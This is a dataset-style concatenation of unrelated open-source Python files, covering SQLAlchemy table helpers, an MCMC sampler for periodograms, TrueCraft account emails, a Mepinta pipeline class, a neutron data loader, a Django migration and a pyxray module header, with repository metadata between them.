except SQLAlchemyError as e:
print(e);
def drop_dataStage01_quantification_physiologicalRatios(self):
try:
data_stage01_quantification_physiologicalRatios_replicates.__table__.drop(self.engine,True);
data_stage01_quantification_physiologicalRatios_averages.__table__.drop(self.engine,True);
except SQLAlchemyError as e:
print(e);
def initialize_dataStage01_quantification_physiologicalRatios(self):
try:
data_stage01_quantification_physiologicalRatios_replicates.__table__.create(self.engine,True);
data_stage01_quantification_physiologicalRatios_averages.__table__.create(self.engine,True);
except SQLAlchemyError as e:
print(e);
def reset_dataStage01_quantification_physiologicalRatios(self,experiment_id_I):
try:
if experiment_id_I:
reset = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
reset = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
self.session.commit();
except SQLAlchemyError as e:
print(e);
def add_dataStage01QuantificationPhysiologicalRatiosReplicates(self, data_I):
'''add rows of data_stage01_quantification_physiologicalRatios_replicates'''
if data_I:
for d in data_I:
try:
data_add = data_stage01_quantification_physiologicalRatios_replicates(d
#d['experiment_id_I'],
#d['sample_name_short_I'],
##d['sample_name_abbreviation_I'],
#d['time_point_I'],
##d['time_point_units_I'],
#d['physiologicalratio_id_I'],
#d['physiologicalratio_name_I'],
#d['physiologicalratio_value_I'],
#d['physiologicalratio_description_I'],
#d['used__I'],
#d['comment__I']
);
self.session.add(data_add);
except SQLAlchemyError as e:
print(e);
self.session.commit();
def update_dataStage01QuantificationPhysiologicalRatiosReplicates(self,data_I):
'''update rows of data_stage02_quantification_lineage'''
if data_I:
for d in data_I:
try:
data_update = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(
data_stage01_quantification_physiologicalRatios_replicates.id==d['id']).update(
{'experiment_id_I':d['experiment_id_I'],
'sample_name_short_I':d['sample_name_short_I'],
#'sample_name_abbreviation_I':d['#sample_name_abbreviation_I'],
'time_point_I':d['time_point_I'],
#'time_point_units_I':d['#time_point_units_I'],
'physiologicalratio_id_I':d['physiologicalratio_id_I'],
'physiologicalratio_name_I':d['physiologicalratio_name_I'],
'physiologicalratio_value_I':d['physiologicalratio_value_I'],
'physiologicalratio_description_I':d['physiologicalratio_description_I'],
'used__I':d['used__I'],
'comment__I':d['comment__I']},
synchronize_session=False);
except SQLAlchemyError as e:
print(e);
self.session.commit(); | mit | -2,891,780,877,875,105,300 | 71.189252 | 240 | 0.658856 | false | 3.758637 | false | false | false |
dhuppenkothen/BayesPSD | BayesPSD/mcmc.py | 1 | 27460 |
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
import numpy as np
import math
import sys
import scipy
import scipy.optimize
from scipy.stats.mstats import mquantiles as quantiles
import scipy.stats
### New: added possibility to use emcee for MCMCs
try:
import emcee
# import acor
emcee_import = True
except ImportError:
print("Emcee and Acor not installed. Using Metropolis-Hastings algorithm for Markov Chain Monte Carlo simulations.")
emcee_import = False
from BayesPSD import utils
from BayesPSD import powerspectrum
### See if cutting-edge numpy is installed so I can use choice
try:
from numpy.random import choice
### if not, use hack
except ImportError:
choice = utils.choice_hack
class MarkovChainMonteCarlo(object):
"""
Markov Chain Monte Carlo for Bayesian QPO searches.
Either wraps around emcee, or uses the
Metropolis-Hastings sampler defined in this file.
Parameters
----------
x : {list, array-like}
Inependent variable, most likely the frequencies of the
periodogram in this context.
y : {list, array-like}
Dependent variable, most likely the powers of the
periodogram in this context.
lpost : Posterior object
An instance of the class Posterior or one of its subclasses;
defines the likelihood and priors to be used.
For periodograms, use
* posterior.PerPosterior for unbinned periodograms
* posterior.StackPerPosterior for binned/stacked periodograms
topt : {list, array-like}
Starting point for generating an initial set of parameter samples.
Should be in a region of high posterior, such that the chains
don't spend a long time exploring regions with low posterior mass.
If possible, make a MAP fit and use the MAP parameters here.
The length of topt needs to match the number of parameters used
in whatever function is stored in lpost.func
tcov: {array-like}
The variances and covarianced between parameters used to generate an
initial set of parameter samples for all chains/walkers.
There are several options here: you can set large variances and no
covariances and effectively leave the Markov chains to explore
the prior mass until they converge. You can also use the inverse
Fisher information (as for example returned by bfgs) as covariance
matrix to make an initial guess. This usually works better in the sense
that it requires fewer steps of the Markov chains.
popt needs to have dimensions (k,k), where k is the number of parameters
taken by lpost.func
covfactor : float, optional, default 1.0
A tuning parameter for the MCMC step. Used only in
Metropolis-Hastings.
niter : int, optional, default 5000
Sets the length of the Markov chains.
For Metropolis-Hastings, this needs to be large (>10000)
For emcee, this can be smaller, but it's a good idea to
verify that the chains have mixed.
nchain : int, optional, default 10
The number of chains or walkers to use in MCMC.
For Metropolis-Hastings, use ~10-20 and many samples
For emcee, use as many as you can afford (~500) and fewer samples
discard : {int, None}, optional, default None
The number of initial samples to discard from the Markov chain.
For emcee, the burn-in time is *always* 200 samples (additional to
whatever is set by niter).
For the Metropolis-Hastings algorithm, the number of initial samples
discarded is set by this variable.
If discard is None, then half of the samples are discarded as default.
parname : list, optional, default None
Include a list of strings here to set parameter names for
plotting
check_conv : boolean, optional, default True
If True, check for convergence of the Markov chains using check_convergence
method below.
NOTE: This was set up explicitly for Metropolis-Hastings. For emcee,
this might not necessarily produce easily interpretable results.
namestr : string, optional, default 'test'
a string to use for saving plots and output files
use_emcee : boolean, optional, default True
If True (STRONGLY RECOMMENDED), use the emcee package
for running MCMC. If False, use Metropolis-Hastings.
plot : boolean, optional, default True
If True, then save some useful plots; in particular,
convergence plots as well as a triangle plot showing
the posterior distributions
printobj : object, optional, default None
In theory, this allows the use of an alternative
to the standard print function in order to save
information to file etc.
NOTE: CURRENTLY DOESN'T WORK PROPERLY!
m : int, optional, default 1
If the input periodogram is the result of stacking
several individual periodograms, or the result of
binning adjacent frequencies into a coarser frequency
resolution, then the distribution to be used in the
likelihood function is different!
Set the number of periodograms averaged/stacked here.
"""
def __init__(self, x, y, lpost, topt, tcov,
covfactor=1.0,
niter=5000,
nchain=10,
discard=None,
parname = None,
check_conv = True,
namestr='test',
use_emcee=True,
plot=True,
printobj = None,
m=1):
self.m = m
self.x = x
self.y = y
self.plot = plot
print("<--- self.ps len MCMC: " + str(len(self.x)))
### set of optimal parameters from MLE fitting
self.topt = topt
print("mcobs topt: " + str(self.topt))
### covariances of fitted parameters
self.tcov = tcov*covfactor
print("mcobs tcov: " + str(self.tcov))
### number of iterations for MCMC algorithm
self.niter = niter
### number of MCMC chains to be computed
self.nchain = nchain
### Error in the fitted parameters
self.terr = np.sqrt(np.diag(tcov))
### function that was fitted
self.lpost = lpost
if discard == None:
discard = math.floor(niter/2.0)
mcall = []
### if emcee package is not installed, enforce Metropolis-Hastings implementation
if emcee_import == False:
print("Emcee not installed. Enforcing M-H algorithm!")
use_emcee = False
### if emcee should be used, then use code below
if use_emcee:
### number of walkers is the number of chains
nwalkers = self.nchain
### number of dimensions for the Gaussian (=number of parameters)
ndim = len(self.topt)
### sample random starting positions for each of the walkers
p0 = [np.random.multivariate_normal(self.topt,self.tcov) for i in xrange(nwalkers)]
### initialize sampler
sampler = emcee.EnsembleSampler(nwalkers,ndim, lpost, args=[False])
### run burn-in phase and reset sampler
pos, prob, state = sampler.run_mcmc(p0, 200)
sampler.reset()
### run actual MCMCs
sampler.run_mcmc(pos, niter, rstate0=state)
### list of all samples stored in flatchain
mcall = sampler.flatchain
### print meanacceptance rate for all walkers and autocorrelation times
print("The ensemble acceptance rate is: " + str(np.mean(sampler.acceptance_fraction)))
self.L = np.mean(sampler.acceptance_fraction)*len(mcall)
self.acceptance = np.mean(sampler.acceptance_fraction)
try:
self.acor = sampler.acor
print("The autocorrelation times are: " + str(sampler.acor))
except ImportError:
print("You can install acor: http://github.com/dfm/acor")
self.acor = None
except RuntimeError:
print("D was negative. No clue why that's the case! Not computing autocorrelation time ...")
self.acor = None
except:
print("Autocorrelation time calculation failed due to an unknown error: " + str(sys.exc_info()[0]) + ". Not computing autocorrelation time.")
self.acor = None
### if emcee_use == False, then use MH algorithm as defined in MarkovChain object below
else:
### loop over all chains
for i in range(nchain):
#t0 = topt + choice([2.0, 3.0, -3.0, -2.0], size=len(topt))*self.terr
### set up MarkovChain object
mcout = MetropolisHastings(topt, tcov, lpost, niter = niter, parname = parname, discard = discard)
### create actual chain
mcout.create_chain(self.x, self.y)
### make diagnostic plots
mcout.run_diagnostics(namestr = namestr +"_c"+str(i), parname=parname)
mcall.extend(mcout.theta)
self.L = mcout.L
mcall = np.array(mcall)
### check whether chains/walkers converged
if check_conv == True:
self.check_convergence(mcall, namestr, printobj = printobj)
### transpose list of parameter sets so that I have lists with one parameter each
self.mcall = mcall.transpose()
### make inferences from MCMC chain, plot to screen and save plots
self.mcmc_infer(namestr=namestr, printobj = printobj)
def check_convergence(self, mcall, namestr, printobj=None, use_emcee = True):
#if printobj:
# print = printobj
#else:
# from __builtin__ import print as print
### compute Rhat for all parameters
rh = self._rhat(mcall, printobj)
self.rhat = rh
plt.scatter(rh, np.arange(len(rh))+1.0 )
plt.axis([0.1,2,0.5,0.5+len(rh)])
plt.xlabel("$R_hat$")
plt.ylabel("Parameter")
plt.title('Rhat')
plt.savefig(namestr + '_rhat.png', format='png')
plt.close()
### compute 80% quantiles
ci0, ci1 = self._quantiles(mcall)
### set array with colours
### make sure there are enough colours available
colours_basic = ['b', 'g', 'r', 'c', 'm', 'y', 'k']
cneeded = int(math.ceil(len(ci0[0])/7.0))
colours = []
for x in range(cneeded):
colours.extend(colours_basic)
### plot 80% quantiles
if self.plot:
plt.plot(0,0)
plt.axis([-2, 2, 0.5, 0.5+len(ci0)])
for j in range(self.nchain):
plt.hlines(y=[m+(j)/(4.0*self.nchain) for m in range(len(ci0))], xmin=[x[j] for x in ci0], xmax=[x[j] for x in ci1], color=colours[j])
#plt.hlines(y=[m+1.0+(1)/(4*self.nchain) for m in np.arange(len(ci0))], xmin=[x[1] for x in ci0], xmax=[x[1] for x in ci1], color=colours[j])
plt.xlabel("80% region (scaled)")
plt.ylabel("Parameter")
plt.title("80% quantiles")
plt.savefig(namestr + "_quantiles.png", format="png")
plt.close()
### auxiliary function used in check_convergence
### computes R_hat, which compares the variance inside chains to the variances between chains
def _rhat(self, mcall, printobj = None):
#if printobj:
# print = printobj
#else:
# from __builtin__ import print as print
print("Computing Rhat. The closer to 1, the better!")
rh = []
### loop over parameters ###
for i,k in enumerate(self.topt):
### pick parameter out of array
tpar = np.array([t[i] for t in mcall])
### reshape back into array of niter*nchain dimensions
tpar = np.reshape(tpar, (self.nchain, len(tpar)/self.nchain))
### compute mean of variance of each chain
#### THIS DOESN'T WORK FOR SOME REASON! TAKES VARIANCE OF EACH ELEMENT!!!
### CHECK THIS!
sj = map(lambda y: np.var(y), tpar)
W = np.mean(sj)
### compute variance of means of each chain
mj = map(lambda y: np.mean(y), tpar)
### note: this assumes the discards
B = np.var(mj)*self.L
## now compute marginal posterior variance
mpv = ((float(self.L)-1.0)/float(self.L))*W + B/float(self.L)
### compute Rhat
rh.append(np.sqrt(mpv/W))
### print convergence message on screen:
print("The Rhat value for parameter " + str(i) + " is: " + str(rh[i]) + ".")
if rh[i] > 1.2:
print("*** HIGH Rhat! Check results! ***")
else:
print("Good Rhat. Hoorah!")
return rh
def _quantiles(self, mcall):
### empty lists for quantiles
ci0, ci1 = [], []
### loop over the parameters ###
for i,k in enumerate(self.topt):
print("I am on parameter: " + str(i))
### pick parameter out of array
tpar = np.array([t[i] for t in mcall])
### reshape back into array of niter*nchain dimensions
tpar = np.reshape(tpar, (self.nchain, len(tpar)/self.nchain))
### compute mean of variance of each chain
intv = map(lambda y: quantiles(y, prob=[0.1, 0.9]), tpar)
### quantiles will return a list with two elements for each
### chain: the 0.1 and 0.9 quantiles
### need to pick out these for each chain
c0 = np.array([x[0] for x in intv])
c1 = np.array([x[1] for x in intv])
### now compute the scale
scale = np.mean(c1-c0)/2.0
### compute means of each chain
mt = map(lambda y: np.mean(y), tpar)
### mean of means of all chains
offset = np.mean(mt)
### rescale quantiles (WHY??)
ci0.append((c0 - offset)/scale)
ci1.append((c1 - offset)/scale)
return ci0, ci1
def mcmc_infer(self, namestr='test', printobj = None):
#if printobj:
# print = printobj
#else:
# from __builtin__ import print as print
### covariance of the parameters from simulations
covsim = np.cov(self.mcall)
print("Covariance matrix (after simulations): \n")
print(str(covsim))
### calculate for each parameter its (posterior) mean and equal tail
### 90% (credible) interval from the MCMC
self.mean = map(lambda y: np.mean(y), self.mcall)
self.std = map(lambda y: np.std(y), self.mcall)
self.ci = map(lambda y: quantiles(y, prob=[0.05, 0.95]), self.mcall)
### print to screen
print("-- Posterior Summary of Parameters: \n")
print("parameter \t mean \t\t sd \t\t 5% \t\t 95% \n")
print("---------------------------------------------\n")
for i in range(len(self.topt)):
print("theta[" + str(i) + "] \t " + str(self.mean[i]) + "\t" + str(self.std[i]) + "\t" + str(self.ci[i][0]) + "\t" + str(self.ci[i][1]) + "\n" )
### produce matrix scatter plots
N = len(self.topt) ### number of parameters
print("N: " + str(N))
n, bins, patches = [], [], []
if self.plot:
fig = plt.figure(figsize=(15,15))
plt.subplots_adjust(top=0.925, bottom=0.025, left=0.025, right=0.975, wspace=0.2, hspace=0.2)
for i in range(N):
for j in range(N):
xmin, xmax = self.mcall[j][:1000].min(), self.mcall[j][:1000].max()
ymin, ymax = self.mcall[i][:1000].min(), self.mcall[i][:1000].max()
ax = fig.add_subplot(N,N,i*N+j+1)
ax.xaxis.set_major_locator(MaxNLocator(5))
ax.ticklabel_format(style="sci", scilimits=(-2,2))
if i == j:
#pass
ntemp, binstemp, patchestemp = ax.hist(self.mcall[i][:1000], 30, normed=True, histtype='stepfilled')
n.append(ntemp)
bins.append(binstemp)
patches.append(patchestemp)
ax.axis([ymin, ymax, 0, max(ntemp)*1.2])
else:
ax.axis([xmin, xmax, ymin, ymax])
### make a scatter plot first
ax.scatter(self.mcall[j][:1000], self.mcall[i][:1000], s=7)
### then add contours
xmin, xmax = self.mcall[j][:1000].min(), self.mcall[j][:1000].max()
ymin, ymax = self.mcall[i][:1000].min(), self.mcall[i][:1000].max()
### Perform Kernel density estimate on data
try:
X,Y = np.mgrid[xmin:xmax:100j, ymin:ymax:100j]
positions = np.vstack([X.ravel(), Y.ravel()])
values = np.vstack([self.mcall[j][:1000], self.mcall[i][:1000]])
kernel = scipy.stats.gaussian_kde(values)
Z = np.reshape(kernel(positions).T, X.shape)
ax.contour(X,Y,Z,7)
except ValueError:
print("Not making contours.")
plt.savefig(namestr + "_scatter.png", format='png')
plt.close()
return
#### POSTERIOR PREDICTIVE CHECKS ################
#
# Note: fpeak is calculated in mle.PerMaxLike.compute_stats
# and can be found in dictionary self.pl_r or self.bpl_r
#
## nsim [int] = number of simulations
## dist [str] = distribution, one of
## "exp": exponential distribution (=chi2_2), np.random.exponential
## "chisquare": chi^2 distribution with df degrees of freedom
## df [int] = degrees of freedom for chi^2 distribution
def simulate_periodogram(self, nsim=5000):
"""
Simulate periodograms from posterior samples of the
broadband noise model.
This method uses the results of an MCMC run to
pick samples from the posterior and use the function
stored in self.lpost.func to create a power spectral form.
In order to transform this into a model periodogram,
it picks for each frequency from an exponential distribution
with a shape parameter corresponding to the model power
at that frequency.
Parameters
----------
nsim : int, optional, default 5000
The number of periodograms to simulate. This number
must be smaller than the number of samples generated
during the MCMC run.
Returns
-------
fps : array-like
An array of shape (nsim, nfrequencies) with all
simulated periodograms.
"""
## the function to use is stored in lpost:
func = self.lpost.func
### number of simulations is either given by the user,
### or defined by the number of MCMCs run!
nsim = min(nsim,len(self.mcall[0]))
### shuffle MCMC parameters
theta = np.transpose(self.mcall)
#print "theta: " + str(len(theta))
np.random.shuffle(theta)
fps = []
percount = 1.0
for x in range(nsim):
### extract parameter set
ain = theta[x]
### compute model 'true' spectrum
mpower = func(self.x, *ain)
### define distribution
if self.m == 1:
#print("m = 1")
noise = np.random.exponential(size=len(self.x))
else:
#print("m = " + str(self.m))
noise = np.random.chisquare(2*self.m, size=len(self.x))/(2.0*self.m)
### add random fluctuations
mpower = mpower*noise
### save generated power spectrum in a PowerSpectrum object
mps = powerspectrum.PowerSpectrum()
mps.freq = self.x
mps.ps = mpower
mps.df = self.x[1] - self.x[0]
mps.n = 2.0*len(self.x)
mps.nphots = mpower[0]
mps.m = self.m
fps.append(mps)
return np.array(fps)
#### MAKE A MARKOV CHAIN OBJECT ###
#
# QUESTION: How can I make an object with variable
# parameters?
#
#
#
# NEED TO THINK ABOUT HOW TO GET ATTRIBUTES!
#
class MetropolisHastings(object):
"""
Parameters
----------
topt : {list, array-like}
Starting point for generating an initial set of parameter samples.
Should be in a region of high posterior, such that the chains
don't spend a long time exploring regions with low posterior mass.
If possible, make a MAP fit and use the MAP parameters here.
The length of topt needs to match the number of parameters used
in whatever function is stored in lpost.func
tcov: {array-like}
The variances and covarianced between parameters used to generate an
initial set of parameter samples for all chains/walkers.
There are several options here: you can set large variances and no
covariances and effectively leave the Markov chains to explore
the prior mass until they converge. You can also use the inverse
Fisher information (as for example returned by bfgs) as covariance
matrix to make an initial guess. This usually works better in the sense
that it requires fewer steps of the Markov chains.
popt needs to have dimensions (k,k), where k is the number of parameters
taken by lpost.func
lpost : Posterior object
An instance of the class Posterior or one of its subclasses;
defines the likelihood and priors to be used.
For periodograms, use
* posterior.PerPosterior for unbinned periodograms
* posterior.StackPerPosterior for binned/stacked periodograms
niter : int, optional, default 5000
Sets the length of the Markov chains.
For Metropolis-Hastings, this needs to be large (>10000)
For emcee, this can be smaller, but it's a good idea to
verify that the chains have mixed.
parname : list, optional, default None
Include a list of strings here to set parameter names for
plotting
discard : {int, None}, optional, default None
The number of initial samples to discard from the Markov chain.
For emcee, the burn-in time is *always* 200 samples (additional to
whatever is set by niter).
For the Metropolis-Hastings algorithm, the number of initial samples
discarded is set by this variable.
If discard is None, then half of the samples are discarded as default.
"""
def __init__(self, topt, tcov, lpost, niter = 5000,
parname=None, discard=None):
self.niter = niter
self.topt = topt
self.tcov = tcov
self.terr = np.sqrt(np.diag(tcov))
self.t0 = topt + choice([2.0, 3.0, -3.0, -2.0], size=len(topt))*self.terr
self.lpost = lpost
self.terr = np.sqrt(np.diag(tcov))
if discard == None:
self.discard = int(niter/2)
else:
self.discard = int(discard)
if parname == None:
self.parname = ['alpha', 'beta', 'gamma', 'delta', 'epsilon', 'zeta', 'eta', 'iota', 'lappa', 'lambda', 'mu']
else:
self.parname = parname
### set up MCMC chain
### possible distributions:
### - 'mvn': multi-variate normal (default)
### - 'stt': student t-test
def create_chain(self, x, y, topt=None, tcov = None, t0 = None, dist='mvn'):
if not topt == None:
self.topt = topt
if not tcov == None:
self.tcov = tcov
if not t0 == None:
self.t0 = t0
### set up distributions
if dist=='mvn':
dist = np.random.multivariate_normal
### set acceptance value to zero
accept = 0.0
### set up array
ttemp, logp = [], []
ttemp.append(self.t0)
#lpost = posterior.PerPosterior(self.ps, self.func)
logp.append(self.lpost(self.t0, neg=False))
for t in np.arange(self.niter-1)+1:
tprop = dist(ttemp[t-1], self.tcov)
pprop = self.lpost(tprop)#, neg=False)
logr = pprop - logp[t-1]
logr = min(logr, 0.0)
r= np.exp(logr)
update = choice([True, False], size=1, p=[r, 1.0-r])
if update:
ttemp.append(tprop)
logp.append(pprop)
if t > self.discard:
accept = accept + 1
else:
ttemp.append(ttemp[t-1])
logp.append(logp[t-1])
self.theta = ttemp[self.discard+1:]
self.logp = logp[self.discard+1:]
self.L = self.niter - self.discard
self.accept = accept/self.L
return
def run_diagnostics(self, namestr=None, parname=None, printobj = None):
#if printobj:
# print = printobj
#else:
# from __builtin__ import print as print
print("Markov Chain acceptance rate: " + str(self.accept) +".")
if namestr == None:
print("No file name string given for printing. Setting to 'test' ...")
namestr = 'test'
if parname == None:
parname = ['alpha', 'beta', 'gamma', 'delta', 'epsilon', 'zeta', 'eta', 'iota', 'lappa', 'lambda', 'mu']
fig = plt.figure(figsize=(12,10))
adj =plt.subplots_adjust(hspace=0.4, wspace=0.4)
for i,th in enumerate(self.theta[0]):
ts = np.array([t[i] for t in self.theta])
p1 = plt.subplot(len(self.topt), 3, (i*3)+1)
p1 = plt.plot(ts)
plt.axis([0, len(ts), min(ts), max(ts)])
plt.xlabel("Number of draws")
plt.ylabel("parameter value")
plt.title("Time series for parameter " + str(parname[i]) + ".")
p2 = plt.subplot(len(self.topt), 3, (i*3)+2)
### plotting histogram
p2 = count, bins, ignored = plt.hist(ts, bins=10, normed=True)
bnew = np.arange(bins[0], bins[-1], (bins[-1]-bins[0])/100.0)
p2 = plt.plot(bnew, 1.0/(self.terr[i]*np.sqrt(2*np.pi))*np.exp(-(bnew - self.topt[i])**2.0/(2.0*self.terr[i]**2.0)), linewidth=2, color='r')
plt.xlabel('value of ' + str(parname[i]))
plt.ylabel('probability')
plt.title("Histogram for parameter " + str(parname[i]) + ".")
nlags = 30
p3 = plt.subplot(len(self.topt), 3, (i*3)+3)
acorr = autocorr(ts,nlags=nlags, norm=True)
p3 = plt.vlines(range(nlags), np.zeros(nlags), acorr, colors='black', linestyles='solid')
plt.axis([0.0, nlags, 0.0, 1.0])
plt.savefig(namestr + "_diag.png", format='png',orientation='landscape')
plt.close()
##############################################################
| bsd-2-clause | -5,221,126,648,205,251,000 | 34.386598 | 157 | 0.569592 | false | 3.849173 | false | false | false |
SirCmpwn/truecraft.io | truecraft/email.py | 1 | 1902 | import smtplib
import pystache
import os
import html.parser
from email.mime.text import MIMEText
from werkzeug.utils import secure_filename
from flask import url_for
from truecraft.database import db
from truecraft.objects import User
from truecraft.config import _cfg, _cfgi
def send_confirmation(user):
if _cfg("smtp-host") == "":
return
smtp = smtplib.SMTP(_cfg("smtp-host"), _cfgi("smtp-port"))
smtp.ehlo()
smtp.starttls()
smtp.login(_cfg("smtp-user"), _cfg("smtp-password"))
with open("emails/confirm-account") as f:
message = MIMEText(html.parser.HTMLParser().unescape(\
pystache.render(f.read(), { 'user': user, "domain": _cfg("domain"), 'confirmation': user.confirmation })))
message['X-MC-Important'] = "true"
message['X-MC-PreserveRecipients'] = "false"
message['Subject'] = "Confirm your TrueCraft account"
message['From'] = _cfg("smtp-user")
message['To'] = user.email
smtp.sendmail(_cfg("smtp-user"), [ user.email ], message.as_string())
smtp.quit()
def send_reset(user):
if _cfg("smtp-host") == "":
return
smtp = smtplib.SMTP(_cfg("smtp-host"), _cfgi("smtp-port"))
smtp.ehlo()
smtp.starttls()
smtp.login(_cfg("smtp-user"), _cfg("smtp-password"))
with open("emails/reset") as f:
message = MIMEText(html.parser.HTMLParser().unescape(\
pystache.render(f.read(), {
'user': user,
"domain": _cfg("domain"),
"protocol": _cfg("protocol"),
'confirmation': user.passwordReset
})))
message['X-MC-Important'] = "true"
message['X-MC-PreserveRecipients'] = "false"
message['Subject'] = "Reset your TrueCraft password"
message['From'] = _cfg("smtp-user")
message['To'] = user.email
smtp.sendmail(_cfg("smtp-user"), [ user.email ], message.as_string())
smtp.quit()
| mit | -3,450,600,462,201,061,000 | 35.576923 | 118 | 0.618297 | false | 3.535316 | false | false | false |
joaduo/mepinta | core/python_core/mepinta/pipeline/lo/pipeline_evaluator/ProcessorArgsManager.py | 1 | 3800 | # -*- coding: utf-8 -*-
'''
Mepinta
Copyright (c) 2011-2012, Joaquin G. Duo, [email protected]
This file is part of Mepinta.
Mepinta is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Mepinta is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Mepinta. If not, see <http://www.gnu.org/licenses/>.
'''
from pipeline_backend.args_management.args_management import createArgs, argsAppendProp,\
argsSetChanged, argsSetUnchanged, argsBuildChangedSet,\
argsSetCapacity, getThreadArgs, argsSetThreadId
from mepinta.pipeline.lo.constants import OUTPUT_PROPS, CUSTOM_OUTPUT_PROPS,\
INPUT_PROPS, CUSTOM_INPUT_PROPS
#from pipeline_backend.args_management.argsSetProcessorContext import argsSetProcessorContext
# TODO: Rename ProcessorArgsManager ProcessorArgsBuilder
# TODO: check getThreadArgs and threading
class ProcessorArgsManager(object):
def __init__(self, context_lo, func_prop_value, thread_id):
self.context_lo = context_lo
self.args = self.createArgs(func_prop_value, thread_id)
self.indexes = {INPUT_PROPS: 0,
OUTPUT_PROPS: 0,
CUSTOM_INPUT_PROPS: 0,
CUSTOM_OUTPUT_PROPS: 0}
self.marked = False
def setInOut(self, in_out_id):
self.in_out_id = in_out_id
def __getCurrentIndex(self):
return self.indexes[self.in_out_id]
def __incrementCurrentIndex(self, delta=1):
self.indexes[self.in_out_id] += delta
def createArgs(self, func_prop_value, thread_id):
# if cached:
if func_prop_value.args == None:
self.new_args = True
#func_prop_value.args = createArgs(in_size,out_size)
func_prop_value.args = createArgs(0, 0)
else:
self.new_args = False
argsSetThreadId(func_prop_value.args, thread_id)
return func_prop_value.args
# else:
# self.new_args = True
# return getThreadArgs(in_size,out_size,thread_id)
def getArgs(self):
return self.args
# def setProcessorContext(self, processor_context):
# argsSetProcessorContext(self.args, processor_context)
def nextProp(self): # useful for skipping a property too
self.__incrementCurrentIndex(1)
def append(self, prop_id, prop, prop_real):
data_type = self.context_lo.data_types[prop_real.dtype_id]
argsAppendProp(self.args, self.in_out_id, self.__getCurrentIndex(),prop_id,prop,prop_real,data_type)
# def update(self, in_prop_ids, out_prop_ids):
# raise RuntimeError("Implement")
def changedValue(self):
argsSetChanged(self.args, self.in_out_id, self.__getCurrentIndex())
def unchangedValue(self):
argsSetUnchanged(self.args, self.in_out_id, self.__getCurrentIndex())
def buildChangedSet(self):
changed = set()
argsBuildChangedSet(self.args, OUTPUT_PROPS, changed)
argsBuildChangedSet(self.args, CUSTOM_OUTPUT_PROPS, changed)
return changed
def shedskin_ProcessorArgsManager(context_lo, func_prop_value, prop):
pam = ProcessorArgsManager(context_lo, func_prop_value, thread_id=0)
prop_id = 100
pam.setInOut(in_out_id=1)
pam.append(prop_id, prop, prop)
pam.getArgs()
pam.nextProp()
pam.append(prop_id, prop, prop)
pam.changedValue()
pam.unchangedValue()
pam.buildChangedSet()
return pam
| gpl-3.0 | 296,367,880,663,941,250 | 35.538462 | 108 | 0.687105 | false | 3.457689 | false | false | false |
granrothge/neutronpy | neutronpy/fileio/loaders/ice.py | 3 | 1564 | from collections import OrderedDict
import numpy as np
from ...data import Data
from ...instrument import Instrument
class Ice(Data):
r"""Loads ICE (NCNR) format ascii data file.
"""
def __init__(self):
super(Ice, self).__init__()
def load(self, filename, build_hkl=True, load_instrument=False):
r"""Loads the ICE (NCNR) format ascii data file.
Parameters
----------
filename : str
Path to file to open
build_hkl : bool, optional
Option to build Q = [h, k, l, e, temp]
load_instrument : bool, optional
Option to build Instrument from file header
"""
with open(filename) as f:
file_header = []
for line in f:
if 'Columns' in line:
args = line.split()
col_headers = [head for head in args[1:]]
break
args = np.genfromtxt(filename, usecols=(0, 1, 2, 3, 4, 5, 6, 7, 8),
unpack=True, comments="#", dtype=np.float64)
data = OrderedDict()
for head, col in zip(col_headers, args):
data[head] = col
self._data = data
self.data_keys = {'detector': 'Detector', 'monitor': 'Monitor', 'time': 'Time'}
self._file_header = file_header
if build_hkl:
self.Q_keys = {'h': 'QX', 'k': 'QY', 'l': 'QZ', 'e': 'E', 'temp': 'Temp'}
if load_instrument:
instrument = Instrument()
self.instrument = instrument
| mit | -5,627,910,622,072,859,000 | 26.928571 | 87 | 0.514066 | false | 4.010256 | false | false | false |
rit-sailing/website | main/migrations/0001_initial.py | 1 | 2192 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-18 02:14
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import phonenumber_field.modelfields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Request',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=254)),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('year_level', models.CharField(choices=[(b'1', b'1st'), (b'2', b'2nd'), (b'3', b'3rd'), (b'4', b'4th'), (b'5', b'5th'), (b'6', b'Other')], default=b'1', max_length=1)),
('accepted', models.BooleanField(default=False)),
('was_checked', models.BooleanField(default=False, editable=False)),
],
),
migrations.CreateModel(
name='TeamMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('year_level', models.CharField(choices=[(b'1', b'1st'), (b'2', b'2nd'), (b'3', b'3rd'), (b'4', b'4th'), (b'5', b'5th'), (b'6', b'Other')], default=b'1', max_length=1)),
('sailing_level', models.CharField(choices=[(b'1', b'Beginner'), (b'2', b'Intermediate'), (b'3', b'Race')], default=b'1', max_length=1)),
('eboard_pos', models.CharField(blank=True, max_length=50)),
('phone_number', phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128)),
('dues_paid', models.DateField(blank=True, null=True)),
('avatar', models.URLField(blank=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| mit | 1,183,421,625,357,386,800 | 47.711111 | 185 | 0.577099 | false | 3.541195 | false | false | false |
ppinard/pyxray | pyxray/composition.py | 2 | 10366 | """"""
__all__ = ["Composition"]
# Standard library modules.
import math
from types import MappingProxyType
import itertools
from fractions import Fraction
import re
# Third party modules.
import pyxray
# Local modules.
# Globals and constants variables.
